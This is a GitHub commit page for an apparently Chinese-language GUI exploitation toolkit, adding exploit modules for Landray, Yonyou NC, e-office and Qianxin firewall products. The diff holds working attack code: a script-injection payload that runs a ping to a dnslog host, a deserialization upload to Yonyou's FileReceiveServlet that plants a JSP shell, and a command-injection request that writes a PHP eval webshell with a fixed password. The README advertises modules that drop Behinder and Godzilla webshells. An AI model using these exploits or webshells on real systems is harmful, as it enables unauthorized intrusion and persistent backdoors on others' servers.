Skip to content

Commit

Permalink
10-07
Browse files Browse the repository at this point in the history
  • Loading branch information
White-hua committed Oct 7, 2022
2 parents e55def0 + 8df4cee commit 7a9d3d6
Show file tree
Hide file tree
Showing 28 changed files with 442 additions and 17 deletions.
19 changes: 16 additions & 3 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -10,17 +10,29 @@ e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)
e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)

蓝凌:
landray_datajson-RCE (可直接执行系统命令)
landray_treexmlTmpl-RCE (可直接执行系统命令)
landray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)

用友:
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)
yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)
yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)
yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)

中间件:
IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)

安全设备:
综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)

网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)

使用截图:
![1](https://user-images.githubusercontent.com/100954709/193958411-6535df75-f731-435b-af43-2bfedb2bf271.png)
![2](https://user-images.githubusercontent.com/100954709/193958423-8eef5bd3-1da0-458b-a5db-8c46809e9fd3.png)
![3](https://user-images.githubusercontent.com/100954709/193958439-cdaf1a64-55f4-4afb-9a44-cfec5e237208.png)

---
## 工具模块:

Expand All @@ -38,7 +50,8 @@ Tasklist敏感进程检测

---
## 问题反馈
可直接提Issu 或加我wx进群交流
可直接提Issu
或加我wx进群交流,微信请备注apt

![my](https://user-images.githubusercontent.com/100954709/193801691-df73fec6-284a-450a-943a-09fe023bcde0.png)

Expand Down
17 changes: 11 additions & 6 deletions src/main/java/Controller/AttController.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -161,7 +161,7 @@ void Att_clicked(MouseEvent event){ //ATT按钮
}
}
}
textArea_attInfo.appendText("\n\n获取shell请单选 不支持批量getshell");
textArea_attInfo.appendText("\n\n如需获取shell请勾选 getshell并选择具体漏洞");

}else if(vulname != null){

Expand Down Expand Up @@ -189,7 +189,6 @@ void Att_clicked(MouseEvent event){ //ATT按钮
@FXML
public void initialize(){
textArea_info.setText("------------------------------------目前EXP如下--------------------------------");
textArea_info.appendText("\n\n<<<<<-----------------------------OA类------------------------------>>>>>");
textArea_info.appendText("\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
Expand All @@ -198,15 +197,19 @@ public void initialize(){
textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)");

textArea_info.appendText("\n\nlandray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)");
textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");

textArea_info.appendText("\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
textArea_info.appendText("\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");

textArea_info.appendText("\n\n<<<<<---------------------------中间件---------------------------->>>>>");
textArea_info.appendText("\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");
textArea_info.appendText("\n\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");

textArea_info.appendText("\n\n<<<<<--------------------------安全设备---------------------------->>>>>");
textArea_info.appendText("\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");

textArea_info.appendText("\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");

Expand Down Expand Up @@ -257,6 +260,8 @@ else if(listview_kinds.getSelectionModel().getSelectedItem().equals("IIS")){

else if(listview_kinds.getSelectionModel().getSelectedItem().equals("海康")){
choiceBox_exp.setItems(Kinds_Exp.hik());
}else if(listview_kinds.getSelectionModel().getSelectedItem().equals("奇安信")){
choiceBox_exp.setItems(Kinds_Exp.qianxin());
}
}
}
47 changes: 47 additions & 0 deletions src/main/java/Exp/OA/landrayoa/landray_datajson.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
package Exp.OA.landrayoa;

import Utilss.HttpTools;
import Utilss.Response;
import Utilss.shell;
import core.Exploitlnterface;
import javafx.scene.control.TextArea;

import java.util.HashMap;

public class landray_datajson implements Exploitlnterface {
@Override
public Boolean checkVul(String url, TextArea textArea) {
Boolean att = att(url, textArea);
return att;
}

@Override
public Boolean getshell(String url, TextArea textArea) {
textArea.appendText("\n 该漏洞已直接执行系统命令,无需getshell");
return false;
}

private Boolean att(String url,TextArea textArea){
String dnspath = shell.readFile(shell.dnspath).replace("http://","");
String replace = dnspath.replace("/", "");
String payload = "?s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec(\"ping%20" + replace + "\")&type=1";
Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
int dns_1 = dns_le1.getText().length();

Response response = HttpTools.get(url + payload, new HashMap<String, String>(), "utf-8");

try { Thread.sleep (5000) ;
} catch (Exception ie){}

Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
int dns_2 = dns_le2.getText().length();

if(dns_2 > dns_1){
textArea.appendText("\n漏洞存在-收到dnslog回显 \n " + url + payload + "\n");
return true;
}else {
textArea.appendText("\nlandray_datajson-RCE-漏洞不存在 (出现误报请联系作者)");
return false;
}
}
}
85 changes: 85 additions & 0 deletions src/main/java/Exp/OA/landrayoa/landray_sysSearchMain.java
View file

Large diffs are not rendered by default.

38 changes: 38 additions & 0 deletions src/main/java/Exp/OA/landrayoa/landray_treexmlTmpl.java
View file

Large diffs are not rendered by default.

15 changes: 10 additions & 5 deletions src/main/java/Exp/OA/weaveroa/weaveroa_office_UploadFile.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,12 +12,20 @@ public class weaveroa_office_UploadFile implements Exploitlnterface {
@Override
public Boolean checkVul(String url, TextArea textArea) {
Boolean att = att(url,shell.Testpath,textArea);
if(att == null){
textArea.appendText("\n e-office logo_UploadFile.php-RCE - 漏洞不存在 (出现误报请联系作者)");
return false;
}
return att;
}

@Override
public Boolean getshell(String url, TextArea textArea) {
Boolean att = att(url, shell.Phppath, textArea);
if(att == null){
textArea.appendText("\n 漏洞存在 被WAF拦截 请手动复现");
return true;
}
return att;
}

Expand All @@ -36,14 +44,11 @@ private Boolean att(String url,String Path,TextArea textArea){

if(post.getCode() == 200 && post.getText().contains("logo-eoffice.php")){
Response response = HttpTools.get(url + "/images/logo/logo-eoffice.php", new HashMap<String, String>(), "utf-8");
System.out.println("到这了");
System.out.println(response.getText());
if(response.getText().contains(shell.test_payload)){
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
textArea.appendText("\n 漏洞存在 测试文件写入成功 \n "+ url + "/images/logo/logo-eoffice.php");
return true;
}else {
textArea.appendText("\n 漏洞可能存在,疑似WAF拦截,请手动复现");
return false;
return null;
}

}else {
Expand Down
116 changes: 116 additions & 0 deletions src/main/java/Exp/OA/yongyou/yongyou_nc_FileReceiveServlet.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,116 @@
package Exp.OA.yongyou;

import Utilss.HttpTools;
import Utilss.Response;
import Utilss.shell;
import core.Exploitlnterface;
import javafx.scene.control.TextArea;

import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;

public class yongyou_nc_FileReceiveServlet implements Exploitlnterface {
@Override
public Boolean checkVul(String url, TextArea textArea) {
Boolean att = att(url, textArea);
return att;
}

@Override
public Boolean getshell(String url, TextArea textArea) {
Boolean shell = shell(url, textArea);
return shell;
}

private Boolean att(String url,TextArea textArea){
Response response = new Response(0, (String)null, (String)null, (String)null);
try {
HashMap<String,String> head = new HashMap<>();
head.put("Content-Type","multipart/form-data;");
HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/FileReceiveServlet");
coon.setRequestMethod("POST");
coon.setDoOutput(true);
coon.setDoInput(true);
coon.setUseCaches(false);
Iterator var5 = head.keySet().iterator();

while(var5.hasNext()) {
String key = (String)var5.next();
coon.setRequestProperty(key, (String)head.get(key));
}
OutputStream outputStream = coon.getOutputStream();
ObjectOutputStream out = new ObjectOutputStream(outputStream);
Map<String, Object> metaInfo=new HashMap<String, Object>();
metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
metaInfo.put("FILE_NAME","nishizhu.txt");
out.writeObject(metaInfo);
outputStream.write(shell.test_payload.getBytes());
out.flush();
out.close();
outputStream.close();
response = HttpTools.getResponse(coon,"utf-8");

Response get_res = HttpTools.get(url + "/nishizhu.txt", new HashMap<String, String>(), "utf-8");
if(get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)){
textArea.appendText("\n 反序列化漏洞存在 txt文件写入成功 \n" + url + "/nishizhu.txt");
return true;
}else {
textArea.appendText("\n nc_FileReceiveServlet-RCE-漏洞不存在 (出现误报请联系作者)");
return false;
}

} catch (Exception e) {
textArea.appendText("\n nc_FileReceiveServlet-RCE-漏洞不存在 (出现误报请联系作者)");
textArea.appendText("\n 连接异常!!!");
}
return false;
}

private Boolean shell(String url,TextArea textArea){
Response response = new Response(0, (String)null, (String)null, (String)null);
try {
HashMap<String,String> head = new HashMap<>();
head.put("Content-Type","multipart/form-data;");
HttpURLConnection coon = HttpTools.getCoon(url + "/servlet/FileReceiveServlet");
coon.setRequestMethod("POST");
coon.setDoOutput(true);
coon.setDoInput(true);
coon.setUseCaches(false);
Iterator var5 = head.keySet().iterator();

while(var5.hasNext()) {
String key = (String)var5.next();
coon.setRequestProperty(key, (String)head.get(key));
}
OutputStream outputStream = coon.getOutputStream();
ObjectOutputStream out = new ObjectOutputStream(outputStream);
Map<String, Object> metaInfo=new HashMap<String, Object>();
metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
metaInfo.put("FILE_NAME","nishizhu.jsp");
out.writeObject(metaInfo);
outputStream.write(shell.readFile(shell.Jsppath).getBytes());
out.flush();
out.close();
outputStream.close();
response = HttpTools.getResponse(coon,"utf-8");

Response get_res = HttpTools.get(url + "/nishizhu.jsp", new HashMap<String, String>(), "utf-8");
if(get_res.getCode() == 200 && get_res.getText().contains(shell.test_payload)){
textArea.appendText("\n 反序列化漏洞存在 shell文件写入成功 \n" + url + "/nishizhu.jsp");
return true;
}else {
textArea.appendText("\n shell被查杀 请免杀!!!!!!!!");
return false;
}

} catch (Exception e) {
textArea.appendText("\n 连接异常!!!");
}
return false;
}

}
1 change: 1 addition & 0 deletions src/main/java/Exp/equipment/HIKVISION/hik_applyCT_fastjson.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@ public Boolean checkVul(String url, TextArea textArea) {

@Override
public Boolean getshell(String url, TextArea textArea) {
textArea.appendText("\n 该漏洞不支持getshell 请自行开启ladp服务利用");
return false;
}

Expand Down
59 changes: 59 additions & 0 deletions src/main/java/Exp/equipment/qianxin/ngfw_waf_router.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
package Exp.equipment.qianxin;

import Utilss.HttpTools;
import Utilss.Response;
import Utilss.shell;
import core.Exploitlnterface;
import javafx.scene.control.TextArea;

import java.util.HashMap;

public class ngfw_waf_router implements Exploitlnterface{
@Override
public Boolean checkVul(String url, TextArea textArea) {
Boolean att = att(url, textArea, "nishizhu.txt", shell.Testpath);
return att;
}

@Override
public Boolean getshell(String url, TextArea textArea) {
Boolean att = shell(url,textArea);
return att;
}

private Boolean att(String url,TextArea textArea,String filename,String filepath){
HashMap<String,String> head = new HashMap<>();
head.put("Content-Type","application/x-www-form-urlencoded");
String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '" + shell.readFile(filepath) +"' >/var/www/html/" + filename + "\"]}],\"type\":\"rpc\",\"tid\":17}";
Response post = HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
if(post.getCode() == 200 && post.getText().contains("success")){
Response response = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");
if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
textArea.appendText("\n 漏洞存在,测试文件已写入 \n" + url + "/" + filename);
return true;
}else {
textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
return false;
}
}else {
textArea.appendText("\n NGFW_waf_router-RCE-漏洞不存在 (出现误报请联系作者)");
return false;
}
}

private Boolean shell(String url,TextArea textArea){
HashMap<String,String> head = new HashMap<>();
head.put("Content-Type","application/x-www-form-urlencoded");
String postString = "{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;echo '9df37afc77bdd582d90aefaf4e35c63e<?php @eval($_POST[nishizhu]);?>' > /var/www/html/nishizhu.php\"]}],\"type\":\"rpc\",\"tid\":17}";
Response post = HttpTools.post(url + "/directdata/direct/router", postString, head, "utf-8");
Response response = HttpTools.get(url + "/nishizhu.php", new HashMap<String, String>(),"utf-8");
if(response.getCode() == 200 && response.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")){
textArea.appendText("\n shell写入成功 \n" + url + "/nishizhu.php");
textArea.appendText("\n 请使用菜刀连接 密码为 nishizhu");
return true;
}else {
textArea.appendText("\n 疑似查杀 请自行复现");
return false;
}
}
}
4 changes: 4 additions & 0 deletions src/main/java/Test.java
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,8 @@
import Utilss.shell;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Test {

Expand Down
9 changes: 6 additions & 3 deletions src/main/java/Utilss/HttpTools.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -108,8 +108,9 @@ public static Response upload(String url, HashMap<String,String> headers,byte[]

OutputStream out = new DataOutputStream(coon.getOutputStream());
File file = new File(filePath);
out.write(start_data);

if(start_data != null) {
out.write(start_data);
}
DataInputStream in = new DataInputStream(new FileInputStream(file));
byte[] bufferOut = new byte[1024];
int bytes = 0;
Expand All @@ -118,7 +119,9 @@ public static Response upload(String url, HashMap<String,String> headers,byte[]
}
out.write("\r\n".getBytes());
in.close();
out.write(end_data);
if(end_data != null) {
out.write(end_data);
}
out.flush();
out.close();

Expand Down
Loading

0 comments on commit 7a9d3d6

Please sign in to comment.